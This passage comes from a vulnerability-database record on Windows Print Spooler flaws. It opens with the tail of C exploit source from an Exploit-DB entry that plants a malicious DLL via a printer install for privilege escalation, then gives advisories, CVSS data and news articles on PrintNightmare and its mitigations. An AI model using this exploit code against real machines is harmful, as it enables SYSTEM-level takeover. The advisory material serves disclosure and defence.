Return value is %d\\n\", ret);\n}\n\nvoid WINAPI WatchDirectories(HANDLE hCompPort) {\n DWORD tid;\n HANDLE hThread;\n\n ReadDirectoryChangesW(DirInfo.hDir, DirInfo.lpBuffer, MAX_BUFFER, TRUE, dwNotifyFilter, &DirInfo.dwBufLength, &DirInfo.Overlapped, NULL);\n\n // Create a thread to sit on the directory changes\n hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)HandleDirectoryChange, hCompPort, 0, &tid);\n\n // Just loop and wait for the user to quit\n InstallPrinter();\n while (_getch() != 'q');\n\n // The user has quit - clean up\n PostQueuedCompletionStatus(hCompPort, 0, 0, NULL);\n\n // Wait for the Directory thread to finish before exiting\n WaitForSingleObject(hThread, INFINITE);\n CloseHandle(hThread);\n}\n\n\nint wmain(int argc, WCHAR *argv[]) {\n HANDLE hCompPort = NULL; // Handle To a Completion Port\n\n if (argc == 6) {\n PrinterName = argv[1];\n TargetDllFullFilePath = argv[2];\n TargetDLLRelFilePath = argv[3];\n MaliciousLibraryFile = argv[4];\n change_counter = _wtoi(argv[5]);\n }\n else {\n wprintf(L\"+ Usage: %s <printer_name> <fullpath_monitor_dll> <rel_path_monitor_dll> <new_dll> <counter>\\n\", argv[0]);\n return 0;\n }\n wprintf(L\"+ Monitoring directory %s\\n\", BaseDirName);\n\n // Get a handle to the directory\n DirInfo.hDir = CreateFile(BaseDirName,\n FILE_LIST_DIRECTORY,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n OPEN_EXISTING,\n FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OVERLAPPED,\n NULL);\n\n if (DirInfo.hDir == INVALID_HANDLE_VALUE) {\n wprintf(L\"Unable to open directory %s. GLE=%ld. 
Terminating...\\n\",\n BaseDirName, GetLastError());\n return 0;\n }\n\n lstrcpy(DirInfo.lpszDirName, BaseDirName);\n\n if (HANDLE hFile = CreateFile(TargetDllFullFilePath,\n GENERIC_WRITE,\n FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n NULL,\n CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL,\n NULL)) {\n wprintf(L\"+ File %s created\\n\", TargetDllFullFilePath);\n CloseHandle(hFile);\n }\n else\n wprintf(L\"+ File %s could not be created\\n\", TargetDllFullFilePath);\n\n\n if ((hCompPort = CreateIoCompletionPort(DirInfo.hDir, hCompPort, (ULONG_PTR)&DirInfo, 0)) == NULL) {\n wprintf(L\"+ CreateIoCompletionPort() failed.\\n\");\n return 0;\n }\n\n wprintf(L\"+ Press <q> to exit\\n\");\n\n // Start watching\n WatchDirectories(hCompPort);\n\n CloseHandle(DirInfo.hDir);\n CloseHandle(hCompPort);\n return 1;\n}", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/local/47962.c", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:37:18", "description": "A remote code execution vulnerability exists in Microsoft Windows. 
Successful exploitation could result in execution of arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-28T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Remote Code Execution (CVE-2020-1300)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1300"], "modified": "2020-10-28T00:00:00", "id": "CPAI-2020-1058", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-05-30T14:37:26", "description": "A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files.\n\nTo exploit the vulnerability, an attacker would have to convince a user to either open a specially crafted cabinet file or spoof a network printer and trick a user into installing a malicious cabinet file disguised as a printer driver.\n\nThe update addresses the vulnerability by correcting how Windows handles cabinet files.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": 
"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1300"], "modified": "2020-06-09T07:00:00", "id": "MS:CVE-2020-1300", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1300", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:57", "description": "A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\n**UPDATE** August 10, 2021: Microsoft has completed the investigation and has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. 
This security update changes the Point and Print default behavior; please see [KB5005652](<https://support.microsoft.com/help/5005652>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-15T07:00:00", "type": "mscve", "title": "Windows Print Spooler Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-34481", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34481", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2022-11-05T06:49:45", "description": "Microsoft Windows Print Spooler is a print backend processor component of Microsoft Corporation (USA). A remote code execution vulnerability exists in Microsoft Windows Print Spooler, which can be exploited by attackers to run arbitrary code with SYSTEM privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T00:00:00", "type": "cnvd", "title": "Microsoft Windows Print Spooler Remote Code Execution Vulnerability (CNVD-2022-10026)", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2022-02-14T00:00:00", "id": "CNVD-2022-10026", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-10026", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-08-18T09:20:53", "description": "# CVE-2021-34481\nCheck patch for CV...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-11T16:56:10", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-08-11T17:01:18", "id": "5E52E412-B5BA-54D6-92C1-F70C151A8199", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "thn": [{"lastseen": "2022-05-09T12:39:19", "description": "[](<https://thehackernews.com/images/-bi5ZcqZAriI/YPUgr-nwSjI/AAAAAAAADPc/Vyz_FgNnVwEF-E_EP0oMclWiGQCCSplZACLcBGAsYHQ/s0/Windows-Printer-Spooler-Vulnerability.jpg>)\n\nMerely days after Microsoft sounded the alarm on an [unpatched security vulnerability](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) in the Windows Print Spooler service, possibly yet another zero-day flaw in the same component has come to light, making it the fourth printer-related shortcoming to be discovered in recent weeks.\n\n\"Microsoft Windows allows for non-admin users to be able to install printer drivers via Point and Print,\" CERT Coordination Center's Will Dormann [said](<https://kb.cert.org/vuls/id/131152>) in an advisory published Sunday. \"Printers installed via this technique also install queue-specific files, which can be arbitrary libraries to be loaded by the privileged Windows Print Spooler process.\"\n\nAn exploit for the vulnerability was disclosed by security researcher and [Mimikatz creator](<https://www.wired.com/story/how-mimikatz-became-go-to-hacker-tool/>) [Benjamin Delpy](<https://twitter.com/gentilkiwi/status/1416079316673339392>).\n\n> [#printnightmare](<https://twitter.com/hashtag/printnightmare?src=hash&ref_src=twsrc%5Etfw>) \\- Episode 4 \n \nYou know what is better than a Legit Kiwi Printer ? 
\n\ud83e\udd5dAnother Legit Kiwi Printer...\ud83d\udc4d \n \nNo prerequisite at all, you even don't need to sign drivers/package\ud83e\udd2a [pic.twitter.com/oInb5jm3tE](<https://t.co/oInb5jm3tE>)\n> \n> \u2014 \ud83e\udd5d Benjamin Delpy (@gentilkiwi) [July 16, 2021](<https://twitter.com/gentilkiwi/status/1416079316673339392?ref_src=twsrc%5Etfw>)\n\nSpecifically, the flaw allows a threat actor to execute arbitrary code with SYSTEM privileges on a vulnerable Windows machine by connecting to a malicious print server under their control.\n\nWhile there is no solution to the problem, CERT/CC recommends configuring \"PackagePointAndPrintServerList\" to prevent the installation of printers from arbitrary servers and blocking outbound SMB traffic at the network boundary, given that public exploits for the vulnerability utilize SMB for connectivity to a malicious shared printer.\n\nThe new issue is only the latest evidence of the fallout after the [PrintNightmare](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>) flaw accidentally became public last month, leading to the discovery of a number of vulnerabilities affecting the Print Spooler service.\n\nGiven the lack of details surrounding [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) \u2014 the local privilege escalation (LPE) flaw reported by security researcher Jacob Baines \u2014 [it's not immediately clear](<https://twitter.com/wdormann/status/1416740343597486087>) what connection, if any, the vulnerability and this new Print Spooler signature-check bypass that also allows for LPE may have with one another.\n\nWhen reached for a response, a Microsoft spokesperson told The Hacker News that \"we are investigating reports and will take appropriate action as needed to help keep customers protected.\"\n", 
"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-19T06:51:00", "type": "thn", "title": "Researcher Uncovers Yet Another Unpatched Windows Printer Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481"], "modified": "2021-07-22T03:40:17", "id": "THN:C2D8045AAD8E4BA5A9168782138B6D52", "href": "https://thehackernews.com/2021/07/researcher-uncover-yet-another.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:14", "description": "[](<https://thehackernews.com/images/-otyRXbM_lrE/YRSmPS71hoI/AAAAAAAADgQ/tTqtA8hUI7kXtRqLCssO2jaV1gRO-zUdACLcBGAsYHQ/s0/printer-hack.gif>)\n\nA day after releasing [Patch Tuesday updates](<https://thehackernews.com/2021/08/microsoft-releases-windows-updates-to.html>), Microsoft acknowledged yet another remote code execution vulnerability in the Windows Print Spooler 
component, adding that it's working to remediate the issue in an upcoming security update.\n\nTracked as [CVE-2021-36958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36958>) (CVSS score: 7.3), the unpatched flaw is the latest to join a [list](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>) of [bugs](<https://thehackernews.com/2021/07/researcher-uncover-yet-another.html>) collectively known as [PrintNightmare](<https://www.cnet.com/news/2021/08/microsoft-releases-windows-updates-to.html%20https://suppor>) that have plagued the printer service and come to light in recent months. Victor Mata of FusionX, Accenture Security, who has been credited with reporting the flaw, [said](<https://twitter.com/offenseindepth/status/1425574625384206339>) the issue was disclosed to Microsoft in December 2020.\n\n\"A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations,\" the company said in its out-of-band bulletin, echoing the vulnerability details for [CVE-2021-34481](<https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html>). \"An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\n[](<https://thehackernews.com/images/-2GxRoKJtyWA/YRSwMjr9x2I/AAAAAAAADgY/_N1Bo0X9GrsWaOMamfoYSHTTfcM5ZJYbwCLcBGAsYHQ/s0/PRINTER.jpg>)\n\nIt's worth noting that the Windows maker has since released [updates](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>) to change the default Point and Print behavior, effectively barring non-administrator users from installing or updating new and existing printer drivers using drivers from a remote computer or server without first elevating themselves to an administrator.\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability. The CERT Coordination Center, in a [vulnerability note](<https://www.kb.cert.org/vuls/id/131152>), is also advising users to block outbound SMB traffic to prevent connecting to a malicious shared printer.\n", 
"cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T05:23:00", "type": "thn", "title": "Microsoft Warns of Another Unpatched Windows Print Spooler RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36958"], "modified": "2021-08-12T06:19:03", "id": "THN:3F83D0C001F2A9046C61A56F5ABE7695", "href": "https://thehackernews.com/2021/08/microsoft-security-bulletin-warns-of.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:20", "description": "[](<https://thehackernews.com/images/-dWO_rqbdIfE/YPENEeXU5vI/AAAAAAAADNg/aAsoS9_8txQ842LEOAjpzJcvpkm6tro9wCLcBGAsYHQ/s0/Windows-Print-Spooler-Vulnerability.jpg>)\n\nMicrosoft on Thursday shared fresh guidance on yet another vulnerability affecting the Windows Print Spooler service, stating that it's working to address it in an upcoming 
security update.\n\nTracked as [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) (CVSS score: 7.8), the issue concerns a local privilege escalation flaw that could be abused to perform unauthorized actions on the system. The company credited security researcher Jacob Baines for discovering and reporting the bug.\n\n\"An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations. An attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges,\" the Windows maker said in its advisory. \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\"\n\nHowever, it's worth pointing out that successful exploitation of the vulnerability requires the attacker to have the ability to execute code on a victim system. In other words, this vulnerability can only be exploited locally to gain elevated privileges on a device.\n\n[](<https://thehackernews.com/images/-KUjZieTgFsk/YPENj7mkDHI/AAAAAAAADNo/7YO-HAzw4LQN5_eg5egoI8gP2YeP34pjwCLcBGAsYHQ/s0/hacking.jpg>)\n\nAs workarounds, Microsoft is recommending users to stop and disable the Print Spooler service to prevent malicious actors from exploiting the vulnerability.\n\nThe development comes days after the Redmond-based firm rolled out patches to address a critical shortcoming in the same component that it disclosed as being actively exploited to stage in-the-wild attacks, making it the third printer-related flaw to come to light in recent weeks.\n\nDubbed PrintNightmare ([CVE-2021-34527](<https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html>)), the vulnerability stems from a missing permission check in the Print Spooler that enables the installation of malicious print drivers to achieve remote code execution or local privilege escalation on vulnerable systems.\n\nHowever, it later emerged that the 
out-of-band security update could be entirely bypassed under specific conditions to gain both local privilege escalation and remote code execution. Microsoft has since said the fixes are \"working as designed and is effective against the known printer spooling exploits and other public reports collectively being referred to as PrintNightmare.\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-16T04:40:00", "type": "thn", "title": "Microsoft Warns of New Unpatched Windows Print Spooler Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-34527"], "modified": "2021-07-17T11:53:08", "id": "THN:CF5E93184467C7B8F56A517CE724ABCF", "href": "https://thehackernews.com/2021/07/microsoft-warns-of-new-unpatched.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": 
"2022-05-09T12:37:54", "description": "[](<https://thehackernews.com/images/-hJTm9-cqglY/YNxU5_qFPTI/AAAAAAAADCE/M7b8MDQXSLEIfe1qnm26-N908L-atUbsQCLcBGAsYHQ/s0/windows-hacking.jpg>)\n\nA proof-of-concept (PoC) exploit related to a remote code execution vulnerability affecting Windows Print Spooler and patched by Microsoft earlier this month was briefly published online before being taken down.\n\nIdentified as [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>), the security issue could grant remote attackers full control of vulnerable systems. [Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler>) manages the printing process in Windows, including loading the appropriate printer drivers and scheduling the print job for printing, among others.\n\nPrint Spooler flaws are concerning, not least because of the wide attack surface, but also owing to the fact that it runs at the highest privilege level and is capable of dynamically loading third-party binaries.\n\nThe Windows maker addressed the vulnerability as part of its [Patch Tuesday](<https://thehackernews.com/2021/06/update-your-windows-computers-to-patch.html>) update on June 8, 2021. 
But almost two weeks later, Microsoft revised the flaw's impact from an elevation of privilege to remote code execution (RCE) as well as upgraded the severity level from Important to Critical.\n\n\"Either the attacker exploits the vulnerability by accessing the target system locally (e.g., keyboard, console), or remotely (e.g., SSH); or the attacker relies on User Interaction by another person to perform actions required to exploit the vulnerability (e.g., tricking a legitimate user into opening a malicious document),\" Microsoft said in its advisory.\n\nThings took a turn when Chinese security firm QiAnXin earlier this week [disclosed](<https://twitter.com/RedDrip7/status/1409353110187757575>) it was able to find the \"right approaches\" to leverage the flaw, thereby demonstrating a successful exploitation to achieve RCE.\n\nAlthough the researchers refrained from sharing additional technical specifics, Hong Kong-based cybersecurity company Sangfor published what's an independent deep-dive of the same vulnerability to GitHub, along with a fully working PoC code, where it remained publicly accessible before it was taken offline a few hours later.\n\nSangfor codenamed the vulnerability \"PrintNightmare.\"\n\n\"We deleted the PoC of PrintNightmare. To mitigate this vulnerability, please update Windows to the latest version, or disable the Spooler service,\" [tweeted](<https://twitter.com/edwardzpeng/status/1409810304091889669>) Sangfor's Principal Security Researcher Zhiniang Peng. 
The findings are expected to be [presented](<https://www.blackhat.com/us-21/briefings/schedule/#diving-in-to-spooler-discovering-lpe-and-rce-vulnerabilities-in-windows-printer-23315>) at the Black Hat USA conference next month.\n\nWindows Print Spooler has long been a source of security vulnerabilities, with Microsoft fixing at least three issues \u2014 [CVE-2020-1048](<https://www.blackhat.com/us-20/briefings/schedule/index.html#a-decade-after-stuxnets-printer-vulnerability-printing-is-still-the-stairway-to-heaven-19685>), [CVE-2020-1300](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1300>), and [CVE-2020-1337](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1337>) \u2014 in the past year alone. Notably, a flaw in the service was also abused to gain remote access and propagate the [Stuxnet](<https://en.wikipedia.org/wiki/Stuxnet>) worm in 2010 targeting Iranian nuclear installations.\n\n_**Update **_**_\u2014_** There are now indications that the fix released by Microsoft for the critical remote code execution vulnerability in the Windows Print spooler service in June does not completely remediate the root cause of the bug, according to the CERT Coordination Center, raising the possibility that it's a zero-day flaw in need of a patch.\n\n\"While Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675,\" CERT/CC's Will Dormann [said](<https://twitter.com/wdormann/status/1410198834970599425>) in a [vulnerability note](<https://kb.cert.org/vuls/id/383432>) published Wednesday.\n\nIt's worth noting that the successful exploitation of CVE-2021-1675 could open the door to complete system takeover by remote adversaries. We have reached out to Microsoft for comment, and we will update the story when we hear back.\n\nIn light of the latest disclosure, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) is [recommending](<https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability>) that administrators \"disable the Windows Print spooler service in Domain Controllers and systems that do not print.\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-30T11:28:00", "type": "thn", "title": "Researchers Leak PoC Exploit for a Critical Windows RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1048", "CVE-2020-1300", "CVE-2020-1337", "CVE-2021-1675"], "modified": "2021-07-02T04:15:41", "id": "THN:EDD5C9F076596EB9D13D36268BDBFAD1", "href": "https://thehackernews.com/2021/06/researchers-leak-poc-exploit-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-05-09T12:39:15", "description": "[](<https://thehackernews.com/images/-KFVbzvrTdtw/YRNbSwawxnI/AAAAAAAADfg/bEuoCVHmHHw4ycTXfnhAqcyuUoWDf2W7gCLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nMicrosoft on Tuesday rolled out [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Aug>) to address a total of 44 security issues affecting its software products and services, one of which it says is an actively exploited zero-day in the wild.\n\nThe update, which is the smallest release since December 2019, squashes seven Critical and 37 Important bugs in Windows, .NET Core & Visual Studio, Azure, Microsoft Graphics Component, Microsoft Office, Microsoft Scripting Engine, Microsoft Windows Codecs Library, Remote Desktop Client, among others. This is in addition to [seven security flaws](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) it patched in the Microsoft Edge browser on August 5.\n\nChief among the patched issues is [CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>) (CVSS score: 7.8), an elevation of privilege flaw affecting Windows Update Medic Service \u2014 a service that enables remediation and protection of Windows Update components \u2014 which could be abused to run malicious programs with escalated permissions.\n\nMicrosoft's Threat Intelligence Center has been credited with reporting the flaw, although the company refrained from sharing additional specifics or detail on how widespread those attacks were in light of active exploitation attempts.\n\nTwo of the security vulnerabilities are publicly known at the time of release -\n\n * 